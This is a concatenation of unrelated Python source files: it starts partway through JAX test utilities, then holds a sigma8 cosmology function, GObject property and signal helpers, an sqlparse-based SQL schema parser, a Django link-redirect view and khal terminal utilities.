nan_flips = rng.rand(*dims) < 0.1
vals = base_rand(shape, dtype)
vals = np.where(posinf_flips, np.array(np.inf, dtype=dtype), vals)
vals = np.where(neginf_flips, np.array(-np.inf, dtype=dtype), vals)
vals = np.where(nan_flips, np.array(np.nan, dtype=dtype), vals)
return _cast_to_shape(np.asarray(vals, dtype=dtype), shape, dtype)
return rand
# TODO(mattjj): doesn't handle complex types
def rand_some_zero(rng):
"""Return a random sampler that produces some zeros."""
base_rand = rand_default(rng)
def rand(shape, dtype):
"""The random sampler function."""
dims = _dims_of_shape(shape)
zeros = rng.rand(*dims) < 0.5
vals = base_rand(shape, dtype)
vals = np.where(zeros, np.array(0, dtype=dtype), vals)
return _cast_to_shape(np.asarray(vals, dtype=dtype), shape, dtype)
return rand
def rand_int(rng, low=0, high=None):
def fn(shape, dtype):
nonlocal high
if low == 0 and high is None:
if np.issubdtype(dtype, np.integer):
high = np.iinfo(dtype).max
else:
raise ValueError("rand_int requires an explicit `high` value for "
"non-integer types.")
return rng.randint(low, high=high, size=shape, dtype=dtype)
return fn
def rand_unique_int(rng, high=None):
def fn(shape, dtype):
return rng.choice(np.arange(high or prod(shape), dtype=dtype),
size=shape, replace=False)
return fn
def rand_bool(rng):
def generator(shape, dtype):
return _cast_to_shape(rng.rand(*_dims_of_shape(shape)) < 0.5, shape, dtype)
return generator
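# Illustrative usage sketch (not part of the original file): every rand_* factory
# above returns a sampler with the signature sampler(shape, dtype). Assuming `rng`
# is a numpy RandomState and `npr`/`np` are the modules imported earlier in this
# file, usage looks roughly like:
#
#   rng = npr.RandomState(0)
#   x = rand_default(rng)((3, 4), np.float32)            # dense random values
#   y = rand_some_inf_and_nan(rng)((3, 4), np.float32)   # ~10% +/-inf and nan entries
#   b = rand_bool(rng)((5,), np.bool_)                    # random booleans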
def check_raises(thunk, err_type, msg):
try:
thunk()
assert False
except err_type as e:
assert str(e).startswith(msg), "\n{}\n\n{}\n".format(e, msg)
def check_raises_regexp(thunk, err_type, pattern):
try:
thunk()
assert False
except err_type as e:
assert re.match(pattern, str(e)), "{}\n\n{}\n".format(e, pattern)
def iter_eqns(jaxpr):
# TODO(necula): why doesn't this search in params?
for eqn in jaxpr.eqns:
yield eqn
for subjaxpr in core.subjaxprs(jaxpr):
yield from iter_eqns(subjaxpr)
def assert_dot_precision(expected_precision, fun, *args):
jaxpr = api.make_jaxpr(fun)(*args)
precisions = [eqn.params['precision'] for eqn in iter_eqns(jaxpr.jaxpr)
if eqn.primitive == lax.dot_general_p]
for precision in precisions:
msg = "Unexpected precision: {} != {}".format(expected_precision, precision)
if isinstance(precision, tuple):
assert precision[0] == expected_precision, msg
assert precision[1] == expected_precision, msg
else:
assert precision == expected_precision, msg
_CACHED_INDICES: Dict[int, Sequence[int]] = {}
def cases_from_list(xs):
xs = list(xs)
n = len(xs)
k = min(n, FLAGS.num_generated_cases)
# Random sampling for every parameterized test is expensive. Do it once and
# cache the result.
indices = _CACHED_INDICES.get(n)
if indices is None:
rng = npr.RandomState(42)
_CACHED_INDICES[n] = indices = rng.permutation(n)
return [xs[i] for i in indices[:k]]
def cases_from_gens(*gens):
sizes = [1, 3, 10]
cases_per_size = int(FLAGS.num_generated_cases / len(sizes)) + 1
for size in sizes:
for i in range(cases_per_size):
yield ('_{}_{}'.format(size, i),) + tuple(gen(size) for gen in gens)
def named_cases_from_sampler(gen):
seen = set()
retries = 0
rng = npr.RandomState(42)
def choose_one(x):
if not isinstance(x, (list, tuple)):
x = list(x)
return [x[rng.randint(len(x))]]
while (len(seen) < FLAGS.num_generated_cases and
retries < FLAGS.max_cases_sampling_retries):
retries += 1
cases = list(gen(choose_one))
if not cases:
continue
if len(cases) > 1:
raise RuntimeError("Generator is expected to only return a single case when sampling")
case = cases[0]
if case["testcase_name"] in seen:
continue
retries = 0
seen.add(case["testcase_name"])
yield case
class JaxTestLoader(absltest.TestLoader):
def getTestCaseNames(self, testCaseClass):
names = super().getTestCaseNames(testCaseClass)
if FLAGS.test_targets:
pattern = re.compile(FLAGS.test_targets)
names = [name for name in names
if pattern.search(f"{testCaseClass.__name__}.{name}")]
if FLAGS.exclude_test_targets:
pattern = re.compile(FLAGS.exclude_test_targets)
names = [name for name in names
if not pattern.search(f"{testCaseClass.__name__}.{name}")]
return names
def with_config(**kwds):
"""Test case decorator for subclasses of JaxTestCase"""
def decorator(cls):
assert inspect.isclass(cls) and issubclass(cls, JaxTestCase), "@with_config can only wrap JaxTestCase class definitions."
cls._default_config = {**JaxTestCase._default_config, **kwds}
return cls
return decorator
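# Illustrative usage sketch (not part of the original file): @with_config overrides
# entries of JaxTestCase._default_config for a single test class, e.g.
#
#   @with_config(jax_numpy_rank_promotion='allow')
#   class MyPromotionTest(JaxTestCase):
#     ...
#
# The key is taken from _default_config below; the 'allow' value is assumed to be
# one of the accepted settings for that option.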
class JaxTestCase(parameterized.TestCase):
"""Base class for JAX tests including numerical checks and boilerplate."""
_default_config = {
'jax_enable_checks': True,
'jax_numpy_rank_promotion': 'raise',
'jax_traceback_filtering': 'off',
}
# TODO(mattjj): this obscures the error messages from failures, figure out how
# to re-enable it
# def tearDown(self) -> None:
# assert core.reset_trace_state()
def setUp(self):
super().setUp()
self._original_config = {}
for key, value in self._default_config.items():
self._original_config[key] = config._read(key)
config.update(key, value)
# We use the adler32 hash for two reasons.
# a) it is deterministic run to run, unlike hash() which is randomized.
# b) it returns values in int32 range, which RandomState requires.
self._rng = npr.RandomState(zlib.adler32(self._testMethodName.encode()))
def tearDown(self):
for key, value in self._original_config.items():
config.update(key, value)
super().tearDown()
def rng(self):
return self._rng
def assertArraysEqual(self, x, y, *, check_dtypes=True, err_msg=''):
"""Assert that x and y arrays are exactly equal."""
if check_dtypes:
self.assertDtypesMatch(x, y)
# Work around https://github.com/numpy/numpy/issues/18992
with np.errstate(over='ignore'):
np.testing.assert_array_equal(x, y, err_msg=err_msg)
def assertArraysAllClose(self, x, y, *, check_dtypes=True, atol=None,
rtol=None, err_msg=''):
"""Assert that x and y are close (up to numerical tolerances)."""
self.assertEqual(x.shape, y.shape)
atol = max(tolerance(_dtype(x), atol), tolerance(_dtype(y), atol))
rtol = max(tolerance(_dtype(x), rtol), tolerance(_dtype(y), rtol))
_assert_numpy_allclose(x, y, atol=atol, rtol=rtol, err_msg=err_msg)
if check_dtypes:
self.assertDtypesMatch(x, y)
def assertDtypesMatch(self, x, y, *, canonicalize_dtypes=True):
if not config.x64_enabled and canonicalize_dtypes:
self.assertEqual(_dtypes.canonicalize_dtype(_dtype(x)),
_dtypes.canonicalize_dtype(_dtype(y)))
else:
self.assertEqual(_dtype(x), _dtype(y))
def assertAllClose(self, x, y, *, check_dtypes=True, atol=None, rtol=None,
canonicalize_dtypes=True, err_msg=''):
"""Assert that x and y, either arrays or nested tuples/lists, are close."""
if isinstance(x, dict):
self.assertIsInstance(y, dict)
self.assertEqual(set(x.keys()), set(y.keys()))
for k in x.keys():
self.assertAllClose(x[k], y[k], check_dtypes=check_dtypes, atol=atol,
rtol=rtol, canonicalize_dtypes=canonicalize_dtypes,
err_msg=err_msg)
elif is_sequence(x) and not hasattr(x, '__array__'):
self.assertTrue(is_sequence(y) and not hasattr(y, '__array__'))
self.assertEqual(len(x), len(y))
for x_elt, y_elt in zip(x, y):
self.assertAllClose(x_elt, y_elt, check_dtypes=check_dtypes, atol=atol,
rtol=rtol, canonicalize_dtypes=canonicalize_dtypes,
err_msg=err_msg)
elif hasattr(x, '__array__') or np.isscalar(x):
self.assertTrue(hasattr(y, '__array__') or np.isscalar(y))
if check_dtypes:
self.assertDtypesMatch(x, y, canonicalize_dtypes=canonicalize_dtypes)
x = np.asarray(x)
y = np.asarray(y)
self.assertArraysAllClose(x, y, check_dtypes=False, atol=atol, rtol=rtol,
err_msg=err_msg)
elif x == y:
return
else:
raise TypeError((type(x), type(y)))
def assertMultiLineStrippedEqual(self, expected, what):
"""Asserts two strings are equal, after dedenting and stripping each line."""
expected = textwrap.dedent(expected)
what = textwrap.dedent(what)
ignore_space_re = re.compile(r'\s*\n\s*')
expected_clean = re.sub(ignore_space_re, '\n', expected.strip())
what_clean = re.sub(ignore_space_re, '\n', what.strip())
if what_clean != expected_clean:
# Print it so we can copy-and-paste it into the test
print(f"Found\n{what}\n")
self.assertMultiLineEqual(expected_clean, what_clean,
msg="Found\n{}\nExpecting\n{}".format(what, expected))
def _CompileAndCheck(self, fun, args_maker, *, check_dtypes=True,
rtol=None, atol=None, check_cache_misses=True):
"""Helper method for running JAX compilation and allclose assertions."""
args = args_maker()
def wrapped_fun(*args):
self.assertTrue(python_should_be_executing)
return fun(*args)
python_should_be_executing = True
python_ans = fun(*args)
python_shapes = tree_map(lambda x: np.shape(x), python_ans)
np_shapes = tree_map(lambda x: np.shape(np.asarray(x)), python_ans)
self.assertEqual(python_shapes, np_shapes)
cache_misses = dispatch.xla_primitive_callable.cache_info().misses
python_ans = fun(*args)
if check_cache_misses:
self.assertEqual(
cache_misses, dispatch.xla_primitive_callable.cache_info().misses,
"Compilation detected during second call of {} in op-by-op "
"mode.".format(fun))
cfun = api.jit(wrapped_fun)
python_should_be_executing = True
monitored_ans = cfun(*args)
python_should_be_executing = False
compiled_ans = cfun(*args)
self.assertAllClose(python_ans, monitored_ans, check_dtypes=check_dtypes,
atol=atol, rtol=rtol)
self.assertAllClose(python_ans, compiled_ans, check_dtypes=check_dtypes,
atol=atol, rtol=rtol)
args = args_maker()
python_should_be_executing = True
python_ans = fun(*args)
python_should_be_executing = False
compiled_ans = cfun(*args)
self.assertAllClose(python_ans, compiled_ans, check_dtypes=check_dtypes,
atol=atol, rtol=rtol)
def _CheckAgainstNumpy(self, numpy_reference_op, lax_op, args_maker,
check_dtypes=True, tol=None, atol=None, rtol=None,
canonicalize_dtypes=True):
args = args_maker()
lax_ans = lax_op(*args)
numpy_ans = numpy_reference_op(*args)
self.assertAllClose(numpy_ans, lax_ans, check_dtypes=check_dtypes,
atol=atol or tol, rtol=rtol or tol,
canonicalize_dtypes=canonicalize_dtypes)
class BufferDonationTestCase(JaxTestCase):
assertDeleted = lambda self, x: self._assertDeleted(x, True)
assertNotDeleted = lambda self, x: self._assertDeleted(x, False)
def _assertDeleted(self, x, deleted):
if hasattr(x, "device_buffer"):
self.assertEqual(x.device_buffer.is_deleted(), deleted)
else:
for buffer in x.device_buffers:
self.assertEqual(buffer.is_deleted(), deleted)
@contextmanager
def ignore_warning(**kw):
with warnings.catch_warnings():
warnings.filterwarnings("ignore", **kw)
yield
# -------------------- Mesh parametrization helpers --------------------
MeshSpec = List[Tuple[str, int]]
@contextmanager
def with_mesh(named_shape: MeshSpec) -> Generator[None, None, None]:
"""Test utility for setting up meshes given mesh data from `schedules`."""
# This is similar to the `with_mesh` function above, but isn't a decorator.
axis_names, shape = unzip2(named_shape)
size = prod(shape)
local_devices = list(api.local_devices())
if len(local_devices) < size:
raise unittest.SkipTest(f"Test requires {size} local devices")
mesh_devices = np.array(local_devices[:size]).reshape(shape)
with Mesh(mesh_devices, axis_names):
yield
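# Illustrative usage sketch (not part of the original file): `named_shape` is a list
# of (axis_name, size) pairs (see MeshSpec above), so a two-device mesh along a
# hypothetical axis 'x' would be requested roughly as
#
#   with with_mesh([('x', 2)]):
#     ...  # run code that refers to mesh axis 'x'
#
# and the test is skipped automatically when fewer local devices are available.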
def with_mesh_from_kwargs(f):
return lambda *args, **kwargs: with_mesh(kwargs['mesh'])(f)(*args, **kwargs)
def with_and_without_mesh(f):
return parameterized.named_parameters(
{"testcase_name": name, "mesh": mesh, "axis_resources": axis_resources}
for name, mesh, axis_resources in (
('', (), ()),
('Mesh', (('x', 2),), (('i', 'x'),))
))(with_mesh_from_kwargs(f))
old_spmd_lowering_flag = None
def set_spmd_lowering_flag(val: bool):
global old_spmd_lowering_flag
old_spmd_lowering_flag = config.experimental_xmap_spmd_lowering
config.update('experimental_xmap_spmd_lowering', val)
def restore_spmd_lowering_flag():
if old_spmd_lowering_flag is None: return
config.update('experimental_xmap_spmd_lowering', old_spmd_lowering_flag)
old_spmd_manual_lowering_flag = None
def set_spmd_manual_lowering_flag(val: bool):
global old_spmd_manual_lowering_flag
old_spmd_manual_lowering_flag = config.experimental_xmap_spmd_lowering_manual
config.update('experimental_xmap_spmd_lowering_manual', val)
def restore_spmd_manual_lowering_flag():
if old_spmd_manual_lowering_flag is None: return
config.update('experimental_xmap_spmd_lowering_manual', old_spmd_manual_lowering_flag)
def create_global_mesh(mesh_shape, axis_names):
size = prod(mesh_shape)
if len(api.devices()) < size:
raise unittest.SkipTest(f"Test requires {size} global devices.")
devices = sorted(api.devices(), key=lambda d: d.id)
mesh_devices = np.array(devices[:size]).reshape(mesh_shape)
global_mesh = Mesh(mesh_devices, axis_names)
return global_mesh
class _cached_property:
null = object()
def __init__(self, method):
self._method = method
self._value = self.null
def __get__(self, obj, cls):
if self._value is self.null:
self._value = self._method(obj)
return self._value
class _LazyDtypes:
"""A class that unifies lists of supported dtypes.
These could be module-level constants, but device_under_test() is not always
known at import time, so we need to define these lists lazily.
"""
def supported(self, dtypes):
supported = supported_dtypes()
return type(dtypes)(d for d in dtypes if d in supported)
@_cached_property
def floating(self):
return self.supported([np.float32, np.float64])
@_cached_property
def all_floating(self):
return self.supported([_dtypes.bfloat16, np.float16, np.float32, np.float64])
@_cached_property
def integer(self):
return self.supported([np.int32, np.int64])
@_cached_property
def all_integer(self):
return self.supported([np.int8, np.int16, np.int32, np.int64])
@_cached_property
def unsigned(self):
return self.supported([np.uint32, np.uint64])
@_cached_property
def all_unsigned(self):
return self.supported([np.uint8, np.uint16, np.uint32, np.uint64])
@_cached_property
def complex(self):
return self.supported([np.complex64, np.complex128])
@_cached_property
def boolean(self):
return self.supported([np.bool_])
@_cached_property
def inexact(self):
return self.floating + self.complex
@_cached_property
def all_inexact(self):
return self.all_floating + self.complex
@_cached_property
def numeric(self):
return self.floating + self.integer + self.unsigned + self.complex
@_cached_property
def all(self):
return (self.all_floating + self.all_integer + self.all_unsigned +
self.complex + self.boolean)
dtypes = _LazyDtypes()
|
the-stack_106_22030
|
import numpy as np
from classy import Class
def compute_sigma8(pars, lnA0 = 3.047):
OmegaM, h= pars
omega_b = 0.02242
lnAs = lnA0
ns = 0.9665
nnu = 1
nur = 2.033
mnu = 0.06
omega_nu = 0.0106 * mnu
omega_c = (OmegaM - omega_b/h**2 - omega_nu/h**2) * h**2
pkparams = {
'output': 'mPk',
'P_k_max_h/Mpc': 20.,
'z_pk': '0.0,10',
'A_s': np.exp(lnAs)*1e-10,
'n_s': ns,
'h': h,
'N_ur': nur,
'N_ncdm': nnu,
'm_ncdm': mnu,
'tau_reio': 0.0568,
'omega_b': omega_b,
'omega_cdm': omega_c}
pkclass = Class()
pkclass.set(pkparams)
pkclass.compute()
sigma8 = pkclass.sigma8()
return sigma8
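# Illustrative usage sketch (not part of the original file): `pars` is (OmegaM, h),
# so a Planck-like call would look roughly like
#
#   s8 = compute_sigma8([0.31, 0.68])
#
# The numeric values are placeholders; all other cosmological parameters are fixed
# inside the function.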
|
the-stack_106_22031
|
#!/usr/bin/env python
# -*- Mode: Python -*-
# vi:si:et:sw=4:sts=4:ts=4
#
# GStreamer python bindings
# Copyright (C) 2004 Johan Dahlin <johan at gnome dot org>
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
PyGTK helper functions
"""
import sys
import gobject
def gobject_set_property(object, property, value):
"""
Set the given property to the given value on the given object.
@type object: L{gobject.GObject}
@type property: string
@param value: value to set property to
"""
for pspec in gobject.list_properties(object):
if pspec.name == property:
break
else:
raise errors.PropertyError(
"Property '%s' in element '%s' does not exist" % (
property, object.get_property('name')))
if pspec.value_type in (gobject.TYPE_INT, gobject.TYPE_UINT,
gobject.TYPE_INT64, gobject.TYPE_UINT64):
try:
value = int(value)
except ValueError:
msg = "Invalid value given for property '%s' in element '%s'" % (
property, object.get_property('name'))
raise errors.PropertyError(msg)
elif pspec.value_type == gobject.TYPE_BOOLEAN:
if value == 'False':
value = False
elif value == 'True':
value = True
else:
value = bool(value)
elif pspec.value_type in (gobject.TYPE_DOUBLE, gobject.TYPE_FLOAT):
value = float(value)
elif pspec.value_type == gobject.TYPE_STRING:
value = str(value)
# FIXME: this is superevil ! we really need to find a better way
# of checking if this property is a param enum
# also, we only allow int for now
elif repr(pspec.__gtype__).startswith("<GType GParamEnum"):
value = int(value)
else:
raise errors.PropertyError('Unknown property type: %s' %
pspec.value_type)
object.set_property(property, value)
def gsignal(name, *args):
"""
Add a GObject signal to the current object.
To be used from class definition scope.
@type name: string
@type args: mixed
"""
frame = sys._getframe(1)
_locals = frame.f_locals
if not '__gsignals__' in _locals:
_dict = _locals['__gsignals__'] = {}
else:
_dict = _locals['__gsignals__']
_dict[name] = (gobject.SIGNAL_RUN_FIRST, None, args)
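# Illustrative usage sketch (not part of the original file): gsignal is called from
# class definition scope, as the docstring says, e.g.
#
#   class Loader(gobject.GObject):
#       gsignal('status-changed', str)
#       gsignal('done')
#
# which fills in __gsignals__ for the class. The class and signal names here are
# invented for the example.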
PARAM_CONSTRUCT = 1<<9
def with_construct_properties(__init__):
"""
Wrap a class' __init__ method in a procedure that will construct
gobject properties. This is necessary because pygtk's object
construction is a bit broken.
Usage::
class Foo(GObject):
def __init__(self):
                GObject.__init__(self)
__init__ = with_construct_properties(__init__)
"""
frame = sys._getframe(1)
_locals = frame.f_locals
gproperties = _locals['__gproperties__']
def hacked_init(self, *args, **kwargs):
__init__(self, *args, **kwargs)
        self._gproperty_values = {}
for p, v in gproperties.items():
if v[-1] & PARAM_CONSTRUCT:
self.set_property(p, v[3])
return hacked_init
def gproperty(type_, name, desc, *args, **kwargs):
"""
Add a GObject property to the current object.
To be used from class definition scope.
@type type_: type object
@type name: string
@type desc: string
@type args: mixed
"""
frame = sys._getframe(1)
_locals = frame.f_locals
flags = 0
def _do_get_property(self, prop):
try:
return self._gproperty_values[prop.name]
except (AttributeError, KeyError):
raise AttributeError('Property was never set', self, prop)
def _do_set_property(self, prop, value):
if not getattr(self, '_gproperty_values', None):
self._gproperty_values = {}
self._gproperty_values[prop.name] = value
_locals['do_get_property'] = _do_get_property
_locals['do_set_property'] = _do_set_property
if not '__gproperties__' in _locals:
_dict = _locals['__gproperties__'] = {}
else:
_dict = _locals['__gproperties__']
for i in 'readable', 'writable':
if not i in kwargs:
kwargs[i] = True
for k, v in kwargs.items():
if k == 'construct':
flags |= PARAM_CONSTRUCT
elif k == 'construct_only':
flags |= gobject.PARAM_CONSTRUCT_ONLY
elif k == 'readable':
flags |= gobject.PARAM_READABLE
elif k == 'writable':
flags |= gobject.PARAM_WRITABLE
elif k == 'lax_validation':
flags |= gobject.PARAM_LAX_VALIDATION
else:
raise Exception('Invalid GObject property flag: %r=%r' % (k, v))
_dict[name] = (type_, name, desc) + args + tuple((flags,))
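# Illustrative usage sketch (not part of the original file): gproperty is likewise
# called from class definition scope, and the positional value after the description
# is what with_construct_properties reads back as the default (v[3]), e.g.
#
#   class Widget(gobject.GObject):
#       gproperty(str, 'label', 'text shown by the widget', '', construct=True)
#       def __init__(self):
#           gobject.GObject.__init__(self)
#       __init__ = with_construct_properties(__init__)
#
# All names and the argument layout beyond what the code above defines are
# assumptions made for this sketch.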
|
the-stack_106_22032
|
# Copyright (C) 2013 Lukas Lalinsky
# Distributed under the MIT license, see the LICENSE file for details.
import re
import sqlparse
from sqlparse import tokens as T
from sqlparse.sql import Token, TokenList, Parenthesis, Statement
def group_parentheses(tokens):
stack = [[]]
for token in tokens:
if token.is_whitespace:
continue
if token.match(T.Punctuation, '('):
stack.append([token])
else:
stack[-1].append(token)
if token.match(T.Punctuation, ')'):
group = stack.pop()
stack[-1].append(Parenthesis(group))
return TokenList(stack[0])
class Set(Statement):
def get_name(self):
idx, set_token = self.token_next_by(m=(T.Keyword, 'SET'))
if set_token is None:
raise ValueError('unknown format - missing SET')
idx, token = self.token_next(idx)
if token is None:
raise ValueError('unknown format - missing SET name')
return token.value
def _find_value(self):
idx, comparison = self.token_next_by(m=(T.Comparison, '='))
if comparison is None:
idx, comparison = self.token_next_by(m=(T.Keyword, 'TO'))
if comparison is None:
raise ValueError('unknown format')
return idx, comparison
def get_value(self):
idx, token = self.token_next(self._find_value()[0])
if token is None or token.match(T.Punctuation, ';'):
return None
if token.ttype == T.String.Single:
return token.value[1:-1]
if token.ttype == T.Name:
return token.value
raise ValueError('unknown format')
class CreateTable(Statement):
def __init__(self, tokens):
Statement.__init__(self, tokens)
self._group_columns()
def _group_columns(self):
idx, body_token = self.token_next_by(Parenthesis)
if body_token is None:
raise ValueError('unknown format - missing TABLE body')
start = 1
end = len(body_token.tokens) - 1
groups = []
while start < end:
group_start = start
while group_start <= end and body_token.tokens[group_start].value.startswith('--'):
group_start += 1
group_end = group_start
while group_end < end:
group_end += 1
if body_token.tokens[group_end].match(T.Punctuation, ','):
break
while group_end < end:
group_end += 1
if not body_token.tokens[group_end].value.startswith('--'):
break
start = group_end
if body_token.tokens[group_start].value not in ('CONSTRAINT', 'CHECK'):
groups.insert(0, (group_start, group_end))
for group_start, group_end in groups:
body_token.group_tokens(CreateTableColumn, group_start, group_end, include_end=0)
def get_name(self):
idx, table_token = self.token_next_by(m=(T.Keyword, 'TABLE'))
if table_token is None:
raise ValueError('unknown format - missing TABLE')
idx, token = self.token_next(idx)
if token is None:
raise ValueError('unknown format - missing TABLE name')
return token.value
def get_columns(self):
for token in self.tokens:
if isinstance(token, Parenthesis):
for sub_token in token.tokens:
if isinstance(sub_token, CreateTableColumn):
yield sub_token
class CreateTableColumnCheckConstraint(TokenList):
def get_name(self):
idx, constraint_token = self.token_next_by(m=(T.Keyword, 'CONSTRAINT'))
if constraint_token is not None:
idx, name_token = self.token_next(idx)
if name_token is not None:
return name_token.value
def _get_body_tokens(self):
idx, body_token = self.token_next_by(i=Parenthesis)
if body_token is not None:
return TokenList(body_token.tokens[1:-1])
def get_body(self):
tokens = []
for token in self._get_body_tokens().flatten():
if token.is_whitespace:
continue
if token.ttype == T.Comment.Single:
continue
# if tokens and not tokens[-1].match(T.Punctuation, '(') and not token.match(T.Punctuation, ')') and not tokens[-1].value == 'E':
# tokens.append(Token(T.Whitespace, ' '))
tokens.append(token)
return group_parentheses(tokens)
class CreateTableColumn(TokenList):
def get_name(self):
name_token = self.token_first()
return name_token.value
def get_type(self):
idx, name_token = self.token_next(-1)
idx, token = self.token_next(idx)
type = token.value
idx, token = self.token_next(idx)
if token and isinstance(token, Parenthesis):
type += token.value
idx, token = self.token_next(idx)
if token and token.normalized == 'WITH':
idx2, t = self.token_next(idx)
if t and t.normalized == 'TIME':
idx2, t = self.token_next(idx2)
if t and t.normalized == 'ZONE':
type += ' WITH TIME ZONE'
idx2, token = self.token_next(idx2)
if token and token.normalized == 'WITHOUT':
idx2, t = self.token_next(idx)
if t and t.normalized == 'TIME':
idx2, t = self.token_next(idx2)
if t and t.normalized == 'ZONE':
type += ' WITHOUT TIME ZONE'
idx2, token = self.token_next(idx2)
return type
def get_default_value(self):
idx, token = self.token_next_by(m=(T.Keyword, 'DEFAULT'))
if token is None:
return None
idx, token = self.token_next(idx)
default = token.value
idx, token = self.token_next(idx)
if token and isinstance(token, Parenthesis):
default += token.value
idx, token = self.token_next(idx)
return default
def get_comments(self):
comments = []
idx, token = self.token_next_by(t=T.Comment.Single)
while token is not None:
comments.append(token.value.strip())
idx += 1
idx, token = self.token_next_by(t=T.Comment.Single, idx=idx)
return comments
def is_not_null(self):
idx, token = self.token_next_by(m=(T.Keyword, 'NOT NULL'))
if token is None:
return False
return True
def get_check_constraint(self):
idx, check_token = self.token_next_by(m=(T.Keyword, 'CHECK'))
if check_token is None:
return None
tokens = []
idx2, constraint_name_token = self.token_prev(idx)
if constraint_name_token is not None:
idx2, constraint_token = self.token_prev(idx2)
if constraint_token is not None and constraint_token.normalized == 'CONSTRAINT':
tokens.append(constraint_token)
tokens.append(constraint_name_token)
tokens.append(check_token)
idx, body_token = self.token_next(idx)
tokens.append(body_token)
return CreateTableColumnCheckConstraint(tokens)
class CreateType(Statement):
def get_name(self):
idx, token = self.token_next_by(t=T.Name)
if token is None:
raise ValueError('unknown format')
return token.value
def get_enum_labels(self):
idx, enum_token = self.token_next_by(m=(T.Name, 'ENUM'))
if enum_token is None:
raise ValueError('unknown format - missing ENUM')
idx, parentheses_tokens = self.token_next(idx)
if parentheses_tokens is None or not isinstance(parentheses_tokens, Parenthesis):
raise ValueError('unknown format - missing parentheses after ENUM')
labels = []
for token in parentheses_tokens.tokens:
if token.ttype == T.String.Single:
labels.append(token.value[1:-1])
return labels
class CreateIndex(Statement):
def get_name(self):
idx, token = self.token_next_by(m=(T.Keyword, 'INDEX'))
if token is None:
raise ValueError('unknown format - missing INDEX')
idx, token = self.token_next(idx)
if token is None:
raise ValueError('unknown format')
return token.value
def is_unique(self):
idx, token = self.token_next_by(m=(T.Keyword, 'INDEX'))
if token is None:
raise ValueError('unknown format - missing INDEX')
idx, token = self.token_prev(idx)
if token is None:
raise ValueError('unknown format')
return token.normalized == 'UNIQUE'
def get_table(self):
idx, token = self.token_next_by(m=(T.Keyword, 'ON'))
if token is None:
raise ValueError('unknown format - missing ON')
idx, token = self.token_next(idx)
if token is None:
raise ValueError('unknown format')
return token.value
def get_columns(self):
idx, parens_token = self.token_next_by(i=Parenthesis)
if parens_token is None:
raise ValueError('unknown format - missing ON')
columns = []
for token in parens_token.tokens:
if token.ttype != T.Punctuation:
columns.append(token.value)
return columns
def parse_statements(statements):
for statement in statements:
clean_tokens = group_parentheses(statement.flatten())
idx, token = statement.token_next(-1)
if token is None:
continue
if token.normalized == 'SET':
statement = Set(clean_tokens.tokens)
elif token.normalized == 'CREATE':
idx, token = statement.token_next(idx)
if token is not None:
if token.normalized == 'TABLE':
statement = CreateTable(clean_tokens.tokens)
elif token.normalized == 'TYPE':
statement = CreateType(clean_tokens.tokens)
elif token.normalized == 'INDEX':
statement = CreateIndex(clean_tokens.tokens)
elif token.normalized == 'UNIQUE':
idx, token = statement.token_next(idx)
if token is not None:
if token.normalized == 'INDEX':
statement = CreateIndex(clean_tokens.tokens)
yield statement
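# Illustrative usage sketch (not part of the original file): the expected entry point
# is sqlparse.parse() followed by parse_statements(), roughly
#
#   for s in parse_statements(sqlparse.parse(
#           "CREATE TABLE artist (id SERIAL, name VARCHAR(255) NOT NULL);")):
#       if isinstance(s, CreateTable):
#           print(s.get_name(), [c.get_name() for c in s.get_columns()])
#
# The SQL text is made up; SET, CREATE TYPE and CREATE INDEX statements are wrapped
# into their classes the same way.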
|
the-stack_106_22036
|
from django.conf import settings
from django.http import HttpResponse
from django.views.generic import DetailView
from core import tasks
from core.models import Link
from core.utils import get_client_ip
class LinkDetailView(DetailView):
model = Link
def get_queryset(self):
qs = super().get_queryset()
return qs.filter(
is_active=True,
company=self.request.company
)
def get(self, request, *args, **kwargs):
obj = self.get_object()
ip = get_client_ip(request)
task = tasks.link_task
if not settings.DEBUG:
task = task.delay
task(
company_id=obj.company.id,
task='visit_create',
pk=obj.pk,
data={'ip_address': ip}
)
response = HttpResponse("", status=301)
response['Location'] = obj.destination
return response
|
the-stack_106_22037
|
# Copyright (c) 2013-2021 khal contributors
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""collection of utility functions"""
import datetime as dt
import pytz
import random
import re
import string
import json
from calendar import month_abbr, timegm
from textwrap import wrap
from click import style
from .terminal import get_color
from typing import Iterator, List, Tuple, Optional
def generate_random_uid() -> str:
"""generate a random uid
when random isn't broken, getting a random UID from a pool of roughly 10^56
should be good enough"""
choice = string.ascii_uppercase + string.digits
return ''.join([random.choice(choice) for _ in range(36)])
RESET = '\x1b[0m'
ansi_reset = re.compile(r'\x1b\[0m')
ansi_sgr = re.compile(r'\x1b\['
'(?!0m)' # negative lookahead, don't match 0m
'([0-9]+;?)+'
'm')
def find_last_reset(string: str) -> Tuple[int, int, str]:
for match in re.finditer(ansi_reset, string): # noqa B007: this is actually used below.
pass
try:
return match.start(), match.end(), match.group(0)
except UnboundLocalError:
return -2, -1, ''
def find_last_sgr(string: str) -> Tuple[int, int, str]:
for match in re.finditer(ansi_sgr, string): # noqa B007: this is actually used below.
pass
try:
return match.start(), match.end(), match.group(0)
except UnboundLocalError:
return -2, -1, ''
